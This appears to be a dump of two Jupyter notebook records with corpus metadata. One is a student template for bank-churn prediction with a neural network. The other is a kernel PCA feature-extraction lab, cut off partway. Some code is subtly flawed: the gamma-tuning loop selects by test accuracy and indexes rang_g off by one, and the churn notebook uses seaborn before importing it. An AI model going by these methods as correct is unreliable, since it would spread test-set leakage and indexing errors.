[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1c41e75008ea57185b6c473857d624d1625b6e
32,594
ipynb
Jupyter Notebook
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
1
2021-12-04T12:11:50.000Z
2021-12-04T12:11:50.000Z
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
null
null
null
M4 Data Mining/W4 Artificial Nural Network/Neural Networks - Churn Prediction - Student File Aug 6.ipynb
fborrasumh/greatlearning-pgp-dsba
2aff5e00f8d6a60e1d819b970901492af703de85
[ "MIT" ]
1
2022-03-20T07:01:46.000Z
2022-03-20T07:01:46.000Z
20.460766
327
0.522489
[ [ [ "# Problem Statement\nCustomer churn and engagement has become one of the top issues for most banks. It costs significantly more to acquire new customers than retain existing. It is of utmost important for a bank to retain its customers. \n \nWe have a data from a MeBank (Name changed) which has a data of 7124 customers. In this data-set we have a dependent variable “Exited” and various independent variables. \n \nBased on the data, build a model to predict when the customer will exit the bank. Split the data into Train and Test dataset (70:30), build the model on Train data-set and test the model on Test-dataset. Secondly provide recommendations to the bank so that they can retain the customers who are on the verge of exiting.\n", "_____no_output_____" ], [ "# Data Dictionary\n<b>CustomerID</b> - Bank ID of the Customer \n<b>Surname</b> - Customer’s Surname \n<b>CreditScore</b> - Current Credit score of the customer \n<b>Geography</b> - Current country of the customer \n<b>Gender</b> - Customer’s Gender \n<b>Age</b> - Customer’s Age \n<b>Tenure</b> - Customer’s duration association with bank in years \n<b>Balance</b> - Current balance in the bank account. \n<b>Num of Dependents</b> - Number of dependents \n<b>Has Crcard</b> - 1 denotes customer has a credit card and 0 denotes customer does not have a credit card \n<b>Is Active Member</b> - 1 denotes customer is an active member and 0 denotes customer is not an active member \n<b>Estimated Salary</b> - Customer’s approx. salary \n<b>Exited</b> - 1 denotes customer has exited the bank and 0 denotes otherwise ", "_____no_output_____" ], [ "### Load library and import data", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neural_network import MLPClassifier", "_____no_output_____" ], [ "churn=pd.read_csv(\"Churn_Modelling.csv\")", "_____no_output_____" ] ], [ [ "### Inspect the data", "_____no_output_____" ] ], [ [ "churn.head()", "_____no_output_____" ], [ "churn.info()", "_____no_output_____" ] ], [ [ "Age and Balance variable has numeric data but data type is object. It appears some special character is present in this variable. \nAlso there are missing values for some variables.", "_____no_output_____" ], [ "# EDA", "_____no_output_____" ], [ "### Removing unwanted variables", "_____no_output_____" ] ], [ [ "# remove the variables and check the data for the 10 rows \n\n\n\nchurn.head(10)", "_____no_output_____" ] ], [ [ "Checking dimensions after removing unwanted variables,", "_____no_output_____" ], [ "### Summary", "_____no_output_____" ] ], [ [ "churn.describe(include=\"all\")", "_____no_output_____" ], [ "churn.shape", "_____no_output_____" ] ], [ [ "### Proportion of observations in Target classes", "_____no_output_____" ] ], [ [ "# Get the proportions\n\n\n", "_____no_output_____" ] ], [ [ "### Checking for Missing values", "_____no_output_____" ] ], [ [ "# Are there any missing values ?\n\n\n\n", "_____no_output_____" ] ], [ [ "There are some missing values", "_____no_output_____" ], [ "### Checking for inconsistencies in Balance and Age variable", "_____no_output_____" ] ], [ [ "churn.Balance.sort_values()", "_____no_output_____" ] ], [ [ "There are 3 cases where '?' is present, and 3 cases where missing values are present for Balance variable. \nSummary also proves the count of missing variables. \nTo confirm on the count of ? 
, running value_counts()", "_____no_output_____" ] ], [ [ "churn.Balance.value_counts()", "_____no_output_____" ], [ "churn[churn.Balance==\"?\"]", "_____no_output_____" ] ], [ [ "This confirms there are 3 cases having ?", "_____no_output_____" ] ], [ [ "churn.Age.value_counts().sort_values()", "_____no_output_____" ] ], [ [ "There is 1 case where ? is present", "_____no_output_____" ], [ "### Replacing ? as Nan in Age and Balance variable", "_____no_output_____" ] ], [ [ "\n\n\n", "_____no_output_____" ] ], [ [ "Verifying count of missing values for Age and Balance variable below:", "_____no_output_____" ] ], [ [ "churn.Balance.isnull().sum()", "_____no_output_____" ], [ "churn.Age.isnull().sum()", "_____no_output_____" ] ], [ [ "### Imputing missing values", "_____no_output_____" ] ], [ [ "sns.boxplot(churn['Credit Score'])", "_____no_output_____" ] ], [ [ "As Outliers are present in the \"Credit Score\", so we impute the null values by median", "_____no_output_____" ] ], [ [ "sns.boxplot(churn['Tenure'])", "_____no_output_____" ], [ "sns.boxplot(churn['Estimated Salary'])", "_____no_output_____" ] ], [ [ "Substituting the mean value for all other numeric variables", "_____no_output_____" ] ], [ [ "for column in churn[['Credit Score', 'Tenure', 'Estimated Salary']]:\n mean = churn[column].mean()\n churn[column] = churn[column].fillna(mean)", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "### Converting Object data type into Categorical", "_____no_output_____" ] ], [ [ "for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:\n if churn[column].dtype == 'object':\n churn[column] = pd.Categorical(churn[column]).codes ", "_____no_output_____" ], [ "churn.head()", "_____no_output_____" ], [ "churn.info()", "_____no_output_____" ] ], [ [ "### Substituting the mode value for all categorical variables", "_____no_output_____" ] ], [ [ "for column in churn[['Geography','Gender','Has CrCard','Is Active Member']]:\n mode = churn[column].mode()\n churn[column] = churn[column].fillna(mode[0])", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "Age and Balance are still not addressed. 
Getting the modal value", "_____no_output_____" ] ], [ [ "churn['Balance'].mode()", "_____no_output_____" ], [ "churn['Age'].mode()", "_____no_output_____" ] ], [ [ "Replacing nan with modal values,", "_____no_output_____" ] ], [ [ "churn['Balance']=churn['Balance'].fillna(3000)\nchurn['Age']=churn['Age'].fillna(37)", "_____no_output_____" ], [ "churn.isnull().sum()", "_____no_output_____" ] ], [ [ "There are no more missing values.", "_____no_output_____" ] ], [ [ "churn.info()", "_____no_output_____" ] ], [ [ "Age and Balance are still object, which has to be converted", "_____no_output_____" ], [ "### Converting Age and Balance to numeric variables", "_____no_output_____" ] ], [ [ "churn['Age']=churn['Age'].astype(str).astype(int)\nchurn['Balance']=churn['Balance'].astype(str).astype(float)", "_____no_output_____" ] ], [ [ "### Checking for Duplicates", "_____no_output_____" ] ], [ [ "# Are there any duplicates ?\ndups = churn.duplicated()\nprint('Number of duplicate rows = %d' % (dups.sum()))\nchurn[dups]", "_____no_output_____" ] ], [ [ "There are no Duplicates", "_____no_output_____" ], [ "### Checking for Outliers", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(15,15))\nchurn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].boxplot(vert=0)", "_____no_output_____" ] ], [ [ "Very small number of outliers are present, which is also not significant as it will not affect much on ANN Predictions", "_____no_output_____" ], [ "### Checking pairwise distribution of the continuous variables", "_____no_output_____" ] ], [ [ "import seaborn as sns\nsns.pairplot(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']])", "_____no_output_____" ] ], [ [ "### Checking for Correlations", "_____no_output_____" ] ], [ [ "# construct heatmap with only continuous variables\nplt.figure(figsize=(10,8))\nsns.set(font_scale=1.2)\nsns.heatmap(churn[['Age','Balance','Credit Score', 'Tenure', 'Estimated Salary']].corr(), annot=True)", "_____no_output_____" ] ], [ [ "There is hardly any correlation between the variables", "_____no_output_____" ], [ "### Train Test Split", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ], [ "#Extract x and y\n\n\n\n", "_____no_output_____" ], [ "#split data into 70% training and 30% test data\n\n\n", "_____no_output_____" ], [ "# Checking dimensions on the train and test data\nprint('x_train: ',x_train.shape)\nprint('x_test: ',x_test.shape)\nprint('y_train: ',y_train.shape)\nprint('y_test: ',y_test.shape)", "_____no_output_____" ] ], [ [ "### Scaling the variables", "_____no_output_____" ] ], [ [ "from sklearn.preprocessing import StandardScaler", "_____no_output_____" ], [ "#Initialize an object for StandardScaler\n\n\n", "_____no_output_____" ], [ "#Scale the training data\n\n\n", "_____no_output_____" ], [ "x_train", "_____no_output_____" ], [ "# Apply the transformation on the test data\nx_test = sc.transform(x_test)", "_____no_output_____" ], [ "x_test", "_____no_output_____" ] ], [ [ "### Building Neural Network Model", "_____no_output_____" ] ], [ [ "clf = MLPClassifier(hidden_layer_sizes=100, max_iter=5000,\n solver='sgd', verbose=True, random_state=21,tol=0.01)", "_____no_output_____" ], [ "# Fit the model on the training data\n\n\n", "_____no_output_____" ] ], [ [ "### Predicting training data", "_____no_output_____" ] ], [ [ "# use the model to predict the training data\ny_pred = \n\n\n", "_____no_output_____" ] ], [ [ "### Evaluating model performance on training data", 
"_____no_output_____" ] ], [ [ "from sklearn.metrics import confusion_matrix,classification_report", "_____no_output_____" ], [ "confusion_matrix(y_train,y_pred)", "_____no_output_____" ], [ "print(classification_report(y_train, y_pred))", "_____no_output_____" ], [ "# AUC and ROC for the training data\n# predict probabilities\nprobs = clf.predict_proba(x_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(y_train, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(y_train, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()", "_____no_output_____" ] ], [ [ "### Predicting Test Data and comparing model performance", "_____no_output_____" ] ], [ [ "y_pred = clf.predict(x_test)", "_____no_output_____" ], [ "confusion_matrix(y_test, y_pred)", "_____no_output_____" ], [ "print(classification_report(y_test, y_pred))", "_____no_output_____" ], [ "# AUC and ROC for the test data\n\n# predict probabilities\nprobs = clf.predict_proba(x_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nauc = roc_auc_score(y_test, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfpr, tpr, thresholds = roc_curve(y_test, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()", "_____no_output_____" ] ], [ [ "### Model Tuning through Grid Search", "_____no_output_____" ], [ "**Below Code may take too much time.These values can be used instead {'hidden_layer_sizes': 500, 'max_iter': 5000, 'solver': 'adam', 'tol': 0.01}**", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import GridSearchCV\n\nparam_grid = {\n 'hidden_layer_sizes': [100,200,300,500],\n 'max_iter': [5000,2500,7000,6000],\n 'solver': ['sgd','adam'],\n 'tol': [0.01],\n}\n\nnncl = MLPClassifier(random_state=1)\n\ngrid_search = GridSearchCV(estimator = nncl, param_grid = param_grid, cv = 10)", "_____no_output_____" ], [ "grid_search.fit(x_train, y_train)", "_____no_output_____" ], [ "grid_search.best_params_", "_____no_output_____" ], [ "best_grid = grid_search.best_estimator_", "_____no_output_____" ], [ "best_grid", "_____no_output_____" ], [ "ytrain_predict = best_grid.predict(x_train)\nytest_predict = best_grid.predict(x_test)", "_____no_output_____" ], [ "confusion_matrix(y_train,ytrain_predict)", "_____no_output_____" ], [ "# Accuracy of Train data\n\n", "_____no_output_____" ], [ "print(classification_report(y_train,ytrain_predict))", "_____no_output_____" ], [ "#from sklearn.metrics import roc_curve,roc_auc_score\nrf_fpr, rf_tpr,_=roc_curve(y_train,best_grid.predict_proba(x_train)[:,1])\nplt.plot(rf_fpr,rf_tpr, marker='x', label='NN')\nplt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC')\nplt.show()\nprint('Area under Curve is', roc_auc_score(y_train,best_grid.predict_proba(x_train)[:,1]))", "_____no_output_____" ], [ "confusion_matrix(y_test,ytest_predict)", "_____no_output_____" ], [ "# Accuracy of Test data\n\n", "_____no_output_____" ], [ "print(classification_report(y_test,ytest_predict))", "_____no_output_____" ], [ "#from sklearn.metrics import roc_curve,roc_auc_score\nrf_fpr, 
rf_tpr,_=roc_curve(y_test,best_grid.predict_proba(x_test)[:,1])\nplt.plot(rf_fpr,rf_tpr, marker='x', label='NN')\nplt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC')\nplt.show()\nprint('Area under Curve is', roc_auc_score(y_test,best_grid.predict_proba(x_test)[:,1]))", "_____no_output_____" ], [ "best_grid.score", "_____no_output_____" ] ], [ [ "## Conclusion", "_____no_output_____" ], [ "AUC on the training data is 86% and on test data is 84%. The precision and recall metrics are also almost similar between training and test set, which indicates no overfitting or underfitting has happened. \n \nbest_grid model has better improved performance over the initial clf model as the sensitivity was much lesser in the initial model.\n\nThe Overall model performance is moderate enough to start predicting if any new customer will churn or not. ", "_____no_output_____" ] ] ]
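Several cells in this student notebook are intentionally left blank (the 70:30 split, the scaler and the model fit). One plausible way to fill them is sketched below, reusing the classifier settings the notebook itself defines; `churn` is assumed to be the cleaned DataFrame from the record above, with the target column named `Exited` as in its data dictionary.

```python
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier

# Features and target (target name taken from the data dictionary).
x = churn.drop("Exited", axis=1)
y = churn["Exited"]

# 70:30 split, keeping class proportions similar in both parts.
x_train, x_test, y_train, y_test = train_test_split(
    x, y, test_size=0.30, random_state=1, stratify=y
)

# Fit the scaler on the training part only, then apply it to the test part.
sc = StandardScaler()
x_train = sc.fit_transform(x_train)
x_test = sc.transform(x_test)

# Same settings as the notebook's initial classifier.
clf = MLPClassifier(hidden_layer_sizes=100, max_iter=5000,
                    solver="sgd", random_state=21, tol=0.01)
clf.fit(x_train, y_train)

print("Train accuracy:", clf.score(x_train, y_train))
print("Test accuracy:", clf.score(x_test, y_test))
```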
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ] ]
cb1c57e6f687eeb22c626fa3a36267f4b5422eaa
321,310
ipynb
Jupyter Notebook
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
1
2021-04-18T21:50:14.000Z
2021-04-18T21:50:14.000Z
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
null
null
null
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
null
null
null
380.699052
142,222
0.918421
[ [ [ "# **Lab Session : Feature extraction II**\n\nAuthor: Vanessa Gómez Verdejo (http://vanessa.webs.tsc.uc3m.es/)\n\nUpdated: 27/02/2017 (working with sklearn 0.18.1)\n\nIn this lab session we are going to work with some of the kernelized extensions of most well-known feature extraction techniques: PCA, PLS and CCA.\n\nAs in the previous notebook, to analyze the discriminatory capability of the extracted features, let's use a linear SVM as classifier and use its final accuracy over the test data to evaluate the goodness of the different feature extraction methods.\n\nTo implement the different approaches we will base on [Scikit-Learn](http://scikit-learn.org/stable/) python toolbox.\n\n#### ** During this lab we will cover: **\n#### *Part 2: Non linear feature selection* \n##### * Part 2.1: Kernel extensions of PCA*\n##### * Part 2.2: Analyzing the influence of the kernel parameter*\n##### * Part 2.3: Kernel MVA approaches*\n\nAs you progress in this notebook, you will have to complete some exercises. Each exercise includes an explanation of what is expected, followed by code cells where one or several lines will have written down `<FILL IN>`. The cell that needs to be modified will have `# TODO: Replace <FILL IN> with appropriate code` on its first line. Once the `<FILL IN>` sections are updated and the code can be run; below this cell, you will find the test cell (beginning with the line `# TEST CELL`) and you can run it to verify the correctness of your solution. ", "_____no_output_____" ] ], [ [ "%matplotlib inline", "_____no_output_____" ] ], [ [ "## *Part 2: Non linear feature selection* ", "_____no_output_____" ], [ "#### ** 2.0: Creating toy problem **\n\nThe following code let you generate a bidimensional problem consisting of thee circles of data with different radius, each one associated to a different class. 
\n\nAs expected from the geometry of the problem, the classification boundary is not linear, so we will able to analyze the advantages of using no linear feature extraction techniques to transform the input space to a new space where a linear classifier can provide an accurate solution.\n", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_circles\nimport matplotlib.pyplot as plt\n\n\nnp.random.seed(0)\nX, Y = make_circles(n_samples=400, factor=.6, noise=.1)\n\nX_c2 = 0.1*np.random.randn(200,2)\nY_c2 = 2*np.ones((200,))\n\nX= np.vstack([X,X_c2])\nY= np.hstack([Y,Y_c2])\n\nplt.figure()\nplt.title(\"Original space\")\nreds = Y == 0\nblues = Y == 1\ngreen = Y == 2\n\nplt.plot(X[reds, 0], X[reds, 1], \"ro\")\nplt.plot(X[blues, 0], X[blues, 1], \"bo\")\nplt.plot(X[green, 0], X[green, 1], \"go\")\nplt.xlabel(\"$x_1$\")\nplt.ylabel(\"$x_2$\")\nplt.show()\n\n# split into a training and testing set\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25)\n\n# Normalizing the data\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n# Binarize the labels for supervised feature extraction methods\nset_classes = np.unique(Y)\nY_train_bin = label_binarize(Y_train, classes=set_classes)\nY_test_bin = label_binarize(Y_test, classes=set_classes)\n", "_____no_output_____" ] ], [ [ "### ** Part 2.1: Kernel PCA**\n\nTo extend the previous PCA feature extraction approach to its non-linear version, we can use of [KernelPCA( )](http://scikit-learn.org/stable/modules/generated/sklearn.decomposition.KernelPCA.html#sklearn.decomposition.KernelPCA) function. \n\nLet's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \\exp (- \\gamma (x_i -x_j)^2)$. ", "_____no_output_____" ], [ "To analyze the advantages of the non linear feature extraction, let's compare it with its linear version. So, let's start computing both linear and kernelized versions of PCA. Complete the following code to obtain the variables (P_train, P_test) and (P_train_k, P_test_k) which have to contain, respectively, the projected data of the linear PCA and the KPCA.\n\nTo start to work, compute a maximum of two new projected features and fix gamma (the kernel parameter) to 1.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import PCA, KernelPCA\n\nN_feat_max=2\n\n# linear PCA\npca = PCA(n_components=N_feat_max)\npca.fit(X_train, Y_train)\nP_train = pca.transform(X_train)\nP_test = pca.transform(X_test)\n\n# KPCA\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=1)\npca_K.fit(X_train, Y_train)\nP_train_k = pca_K.transform(X_train)\nP_test_k =pca_K.transform(X_test)\n\nprint 'PCA and KPCA projections sucessfully computed'", "PCA and KPCA projections sucessfully computed\n" ] ], [ [ "Now, let's evaluate the discriminatory capability of the projected data (both linear and kernelized ones) feeding with them a linear SVM and measuring its accuracy over the test data. 
Complete the following to code to return in variables acc_test_lin and acc_test_kernel the SVM test accuracy using either the linear PCA projected data or the KPCA ones.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Define SVM classifier\nfrom sklearn import svm\nclf = svm.SVC(kernel='linear')\n\n# Train it using linear PCA projections and evaluate it\nclf.fit(P_train, Y_train)\nacc_test_lin = clf.score(P_test, Y_test)\n\n# Train it using KPCA projections and evaluate it\nclf.fit(P_train_k, Y_train)\nacc_test_kernel = clf.score(P_test_k, Y_test)\n\nprint(\"The test accuracy using linear PCA projections is %2.2f%%\" %(100*acc_test_lin))\nprint(\"The test accuracy using KPCA projections is %2.2f%%\" %(100*acc_test_kernel))\n", "The test accuracy using linear PCA projections is 24.00%\nThe test accuracy using KPCA projections is 95.33%\n" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(np.round(acc_test_lin,4), 0.2400, 'incorrect result: test accuracy using linear PCA projections is uncorrect')\nTest.assertEquals(np.round(acc_test_kernel,4), 0.9533, 'incorrect result: test accuracy using KPCA projections is uncorrect')\n", "1 test passed.\n1 test passed.\n" ] ], [ [ "Finally, let's analyze the transformation capabilities of the projected data using a KPCA vs. linear PCA plotting the resulting projected data for both training and test data sets.\n\nJust run the following cells to obtain the desired representation. ", "_____no_output_____" ] ], [ [ "def plot_projected_data(data, label):\n \n \"\"\"Plot the desired sample data assigning differenet colors according to their categories.\n Only two first dimensions of data ar plot and only three different categories are considered.\n\n Args:\n data: data set to be plot (number data x dimensions). \n labes: target vector indicating the category of each data.\n \"\"\"\n \n reds = label == 0\n blues = label == 1\n green = label == 2\n\n plt.plot(data[reds, 0], data[reds, 1], \"ro\")\n plt.plot(data[blues, 0], data[blues, 1], \"bo\")\n plt.plot(data[green, 0], data[green, 1], \"go\")\n plt.xlabel(\"$x_1$\")\n plt.ylabel(\"$x_2$\")", "_____no_output_____" ], [ "plt.figure(figsize=(8, 8))\nplt.subplot(2,2,1)\nplt.title(\"Projected space of linear PCA for training data\")\nplot_projected_data(P_train, Y_train)\n\nplt.subplot(2,2,2)\nplt.title(\"Projected space of KPCA for training data\")\nplot_projected_data(P_train_k, Y_train)\n\nplt.subplot(2,2,3)\nplt.title(\"Projected space of linear PCA for test data\")\nplot_projected_data(P_test, Y_test)\n\nplt.subplot(2,2,4)\nplt.title(\"Projected space of KPCA for test data\")\nplot_projected_data(P_test_k, Y_test)\n\nplt.show()", "_____no_output_____" ] ], [ [ "Go to the first cell and modify the kernel parameter (for instance, set gamma to 10 or 100) and run the code again. What is it happening? Why? \n", "_____no_output_____" ], [ "### ** Part 2.2: Analyzing the influence of the kernel parameter**\n\nIn the case of working with RBF kernel, the kernel width selection can be critical:\n* If gamma value is too high the width of the RBF is reduced (tending to be a delta function) and, therefore, the interaction between the training data is null. 
So we project each data over itself and assign it a dual variable in such a way that the best possible projection (for classification purposes) of the training data is obtain (causing overfitting problems).\n* If gamma value is close to zero, the RBF width increases and the kernel behavior tends to be similar to a linear kernel. In this case, the non-linear properties are lost.\n\nTherefore, in this kind of applications, the value of kernel width can be critical and it's advised selecting it by cross validation.\n\nThis part of lab section aims to adjust the gamma parameter by a validation process. So, we will start creating a validation partition of the training data.", "_____no_output_____" ] ], [ [ "## Redefine the data partitions: creating a validation partition\n\n# split training data into a training and validation set\nX_train2, X_val, Y_train2, Y_val = train_test_split(X_train, Y_train, test_size=0.33)\n\n# Normalizing the data\nscaler = StandardScaler()\nX_train2 = scaler.fit_transform(X_train2)\nX_val = scaler.transform(X_val)\nX_test = scaler.transform(X_test)\n\n# Binarize the training labels for supervised feature extraction methods\nset_classes = np.unique(Y)\nY_train_bin2 = label_binarize(Y_train2, classes=set_classes)", "_____no_output_____" ] ], [ [ "Now let's evaluate the KPCA performance when different values of gamma are used. So, complete the below code in such a way that for each gamma value you can:\n* Train the KPCA and obtain the projections for the training, validation and test data.\n* Obtain the accuracies of a linear SVM over the validation and test partitions.\n\nOnce, you have the validation and test accuracies for each gamma value, obtain the optimum gamma value (i.e., the gamma value which provides the maximum validation accuracy) and its corresponding test accuracy.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn import svm\n\nnp.random.seed(0)\n\n# Defining parameters\nN_feat_max = 2\nrang_g = [0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50 , 100, 500, 1000]\n\n# Variables to save validation and test accuracies\nacc_val = []\nacc_test = []\n\n# Bucle to explore gamma values\nfor g_value in rang_g:\n print 'Evaluting with gamma ' + str(g_value)\n \n # 1. Train KPCA and project the data\n pca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=g_value)\n pca_K.fit(X_train2, Y_train2)\n P_train_k = pca_K.transform(X_train2)\n P_val_k = pca_K.transform(X_val)\n P_test_k = pca_K.transform(X_test)\n \n # 2. 
Evaluate the projection performance\n clf = svm.SVC(kernel='linear')\n clf.fit(P_train_k, Y_train2)\n acc_val.append(clf.score(P_val_k, Y_val))\n acc_test.append(clf.score(P_test_k, Y_test))\n\n# Find the optimum value of gamma and its corresponging test accuracy\npos_max = np.argmax(acc_test)\ng_opt = rang_g[pos_max+1]\nacc_test_opt = acc_test[pos_max]\n\nprint 'Optimum of value of gamma: ' + str(g_opt)\nprint 'Test accuracy: ' + str(acc_test_opt)\n", "Evaluting with gamma 0.01\nEvaluting with gamma 0.05\nEvaluting with gamma 0.1\nEvaluting with gamma 0.5\nEvaluting with gamma 1\nEvaluting with gamma 5\nEvaluting with gamma 10\nEvaluting with gamma 50\nEvaluting with gamma 100\nEvaluting with gamma 500\nEvaluting with gamma 1000\nOptimum of value of gamma: 1\nTest accuracy: 0.946666666667\n" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(g_opt, 1, 'incorrect result: validated gamma value is uncorrect')\nTest.assertEquals(np.round(acc_test_opt,4), 0.9467, 'incorrect result: validated test accuracy is uncorrect')\n", "1 test passed.\n1 test passed.\n" ] ], [ [ "Finally, just run the next code to train the final model with the selected gamma value and plot the projected data", "_____no_output_____" ] ], [ [ "# Train KPCA and project the data\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=g_opt)\npca_K.fit(X_train2)\nP_train_k = pca_K.transform(X_train2)\nP_val_k = pca_K.transform(X_val)\nP_test_k = pca_K.transform(X_test)\n \n# Plot the projected data\nplt.figure(figsize=(15, 5))\nplt.subplot(1,3,1)\nplt.title(\"Projected space of KPCA: train data\")\nplot_projected_data(P_train_k, Y_train2)\n\nplt.subplot(1,3,2)\nplt.title(\"Projected space of KPCA: validation data\")\nplot_projected_data(P_val_k, Y_val)\n\nplt.subplot(1,3,3)\nplt.title(\"Projected space of KPCA: test data\")\nplot_projected_data(P_test_k, Y_test)\n\nplt.show()\n", "_____no_output_____" ] ], [ [ "### ** Part 2.3: Kernel MVA approaches**", "_____no_output_____" ], [ "Until now, we have only used the KPCA approach because is the only not linear feature extraction method that it is included in Scikit-Learn. \n\nHowever, if we compare linear and kernel versions of MVA approaches, we could extend any linear MVA approach to its kernelized version. In this way, we can use the same methods reviewed for the linear approaches and extend them to its non-linear fashion calling it with the training kernel matrix, instead of the training data, and the method would learn the dual variables, instead of the eigenvectors.\n\nThe following table relates both approaches:\n\n| | Linear | Kernel |\n|------ |---------------------------|----------------------------|\n|Input data | ${\\bf X}$ | ${\\bf K}$ | \n|Variables to compute (fit) |Eigenvectors (${\\bf U}$) |Dual variables (${\\bf A}$) | \n|Projection vectors | ${\\bf U}$ |${\\bf U}=\\Phi^T {\\bf A}$ (cannot be computed) |\n|Project data (transform) |${\\bf X}' = {\\bf U}^T {\\bf X}^T$|${\\bf X}' ={\\bf A}^T \\Phi \\Phi^T = {\\bf A}^T {\\bf K}$|\n", "_____no_output_____" ], [ "** Computing and centering kernel matrix **\n\nLet's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. 
